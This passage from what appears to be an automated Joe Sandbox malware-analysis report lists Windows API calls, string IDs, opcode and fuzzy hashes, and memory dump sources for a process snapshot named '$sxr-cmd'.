                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$_setjmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 3883041866-0
                                                                                                            • Opcode ID: 24b193531554a553586c69ba7b5e2834a1963165cbc680f5adf951f0dc341e04
                                                                                                            • Instruction ID: abad54eaec2b97dcd7469ce1afb6c3d4ce7beec4b89920e3a69d43c1797c7dd1
                                                                                                            • Opcode Fuzzy Hash: 24b193531554a553586c69ba7b5e2834a1963165cbc680f5adf951f0dc341e04
                                                                                                            • Instruction Fuzzy Hash: 58514232608B868EEBA1EF21D8803E9B7A4FB49754F804135DA4D5BA58DF3DD64DCB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137EB4BD
                                                                                                              • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
                                                                                                              • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
                                                                                                              • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
                                                                                                              • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137EB518
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137EB58B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                            • String ID: ELSE$IF/?
                                                                                                            • API String ID: 3223794493-1134991328
                                                                                                            • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                            • Instruction ID: 57b61cac977ab494e7cf4edadfddb776f0a3859f519955125525af31e912dc3d
                                                                                                            • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                            • Instruction Fuzzy Hash: E1416621A0DE0381FBE4BB25A4912BDAAA5AF48760FC44539D51E77395EE3DE41C8330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1532185241-0
                                                                                                            • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                            • Instruction ID: e6d16f0d2fc423c6ab2b3be0d05bff1daf9e23660ac28f5dd115e9e5fc9fbb76
                                                                                                            • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                            • Instruction Fuzzy Hash: 5F41F632A04F518BE794AB21D44157EFAE1FB88B60F844535EA0A67781CF3DE959C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3588551418-0
                                                                                                            • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                            • Instruction ID: 4cd08ad90fe35ef34c173f672d6334eaa7369ed0c837802fb8e16a6357c248c5
                                                                                                            • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                            • Instruction Fuzzy Hash: 50419031A08A46CBE794AB11948027DE691EF88BB1F944138E60E67791DF7DE85C8770
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2123716050-0
                                                                                                            • Opcode ID: ee032107b5e0b45f2cd1eb5c2fd3004c7ad094b49dd3a9eb4ad0f3ee6277fee3
                                                                                                            • Instruction ID: 72fb605b4348cd2edf4069e9213a2d6f6094360c4ee18aa9f509d1b30faff3e8
                                                                                                            • Opcode Fuzzy Hash: ee032107b5e0b45f2cd1eb5c2fd3004c7ad094b49dd3a9eb4ad0f3ee6277fee3
                                                                                                            • Instruction Fuzzy Hash: 2C41A032705EC28AEBB1AF21D8803E9A794FB49798F444134DA5D4EA98DF3CE248C710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3114114779-0
                                                                                                            • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                            • Instruction ID: 56a710625c2a90c19be27f3e45a1872f1518bfd13c9552dd0368ba9cab3fdf57
                                                                                                            • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                            • Instruction Fuzzy Hash: 6D410A36A05F42CEE780EF65D4802ACB7A5FB48768F954135DA0DA3B54DF38D41AC760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A77A
                                                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A7AF
                                                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A80E
                                                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A839
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A850
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue$CloseErrorLastOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2240656346-0
                                                                                                            • Opcode ID: fab5d7ce924ce7ff34160a1e6dbe691a1ea5e09fa15a4ad8ec0eca9d581aded6
                                                                                                            • Instruction ID: 7afcc8553fcbc4c1fa98d48f8ff8986b3ab4b7c78ccee1aa75144d88acc41263
                                                                                                            • Opcode Fuzzy Hash: fab5d7ce924ce7ff34160a1e6dbe691a1ea5e09fa15a4ad8ec0eca9d581aded6
                                                                                                            • Instruction Fuzzy Hash: D231A232618F4286F7909F14E480479F6E4FB8D7A0F944230EA8E66754DF3DD4698B20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F01B8: _get_osfhandle.MSVCRT ref: 00007FF7137F01C4
                                                                                                              • Part of subcall function 00007FF7137F01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F01D6
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF71380D0F9
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71380D10F
                                                                                                            • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71380D166
                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF71380D17A
                                                                                                            • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF71380D18C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3008996577-0
                                                                                                            • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                            • Instruction ID: 1dbefaea7e9d4fa0e53f338a8ca554db0d7e1a4482d0dcd2745341badd4194a5
                                                                                                            • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                            • Instruction Fuzzy Hash: 75215A22B14A51CEF740AB71E8400BDBBB0FB8DB64B845125EE1D63B98DF38D059CB24
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: 293195b8bbf4479d610c4483b0a03604a2021c60c1f7caa8b5aec6deb79c3708
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: 6411A732A55E35E1FE681165D47DBE910C37BF537CFC406A4FA66073DE8B584889C224
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _set_statfp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156100317-0
                                                                                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction ID: 09311781c0dc539dba5ee21173bc5950b06e8c53d9b3039d5ae7eac255293120
                                                                                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                            • Instruction Fuzzy Hash: 9D11C836A50E30E9FFD41156F45DBE910E7BBF43BCE9406A4BA670EFE68B144849CA00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1452528299-0
                                                                                                            • Opcode ID: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction ID: 3c501c5a33c7aab8c2083f20e6b4acc8cc8432e261da8965f6a8f7d642ad437a
                                                                                                            • Opcode Fuzzy Hash: afeb0ab3ae9b140264ba62f65efacef86e232e555d1866a57a7faeca2321756a
                                                                                                            • Instruction Fuzzy Hash: F411BB31201E39F2FE105B25985CFE42293A7E67A9F980AA4F927573D5EF38C4098210
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092925422-0
                                                                                                            • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction ID: cb8c35307c11de4a3327e203cbf00dd481b0423d58b9e79f27c6fc53f4eff856
                                                                                                            • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                            • Instruction Fuzzy Hash: E4114C36605F54E7EF248F11E448A89A7B1F795B98F844065EB4913B98EF39C548C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF71380C9EE,?,?,?,00007FF71380EA6C,?,?,?,00007FF71380E925), ref: 00007FF7137F5CCB
                                                                                                            • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00007FF71380C9EE,?,?,?,00007FF71380EA6C,?,?,?,00007FF71380E925), ref: 00007FF7137F5CDF
                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7137F5D03
                                                                                                            • fprintf.MSVCRT ref: 00007FF7137FF4A9
                                                                                                            • fflush.MSVCRT ref: 00007FF7137FF4C2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1826527819-0
                                                                                                            • Opcode ID: 9b0532f4637facb70c38994ad755a75d253ca2745f37b53511dc5f2b70e91ec1
                                                                                                            • Instruction ID: e3e39b6dc3ea46fb18c2330d31135915297370fc2491832b21847ee7b79b62ec
                                                                                                            • Opcode Fuzzy Hash: 9b0532f4637facb70c38994ad755a75d253ca2745f37b53511dc5f2b70e91ec1
                                                                                                            • Instruction Fuzzy Hash: 5C015B21908E82CAE7847B24A4442B9FEA0FB8E761FC45130D95F16392DF7D905CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateSemaphore
                                                                                                            • String ID: _p0$wil
                                                                                                            • API String ID: 1078844751-1814513734
                                                                                                            • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                            • Instruction ID: d696eb3f0ded21e14c5eed12c0e4377fd59e900b14d3232d9b41feab2d408457
                                                                                                            • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                            • Instruction Fuzzy Hash: 6451D561B1DE46C6EFA1AF5494542BAA2D0EF84BA0FD44435DE4D2FB84DE3ED4198330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 3242871069-629598281
                                                                                                            • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction ID: 0337673d71b2a8948f8be49ccb245bd0bc16d2fe48ac4eb075a83ad74432d2f4
                                                                                                            • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                            • Instruction Fuzzy Hash: B951B436711A21EAEF54DB15D448F9D3BA7F3A4BDCFA081A0EA1647788DB35D849C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF71380B934
                                                                                                            • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7137F5085), ref: 00007FF71380B9A5
                                                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7137F5085), ref: 00007FF71380B9F7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
